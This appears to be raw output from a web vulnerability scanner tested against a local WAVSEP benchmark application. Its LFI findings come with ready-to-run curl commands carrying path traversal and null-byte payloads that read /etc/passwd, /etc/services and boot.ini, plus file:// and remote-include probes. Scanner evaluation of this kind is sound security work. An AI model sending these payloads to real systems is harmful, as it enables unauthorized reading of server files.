curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
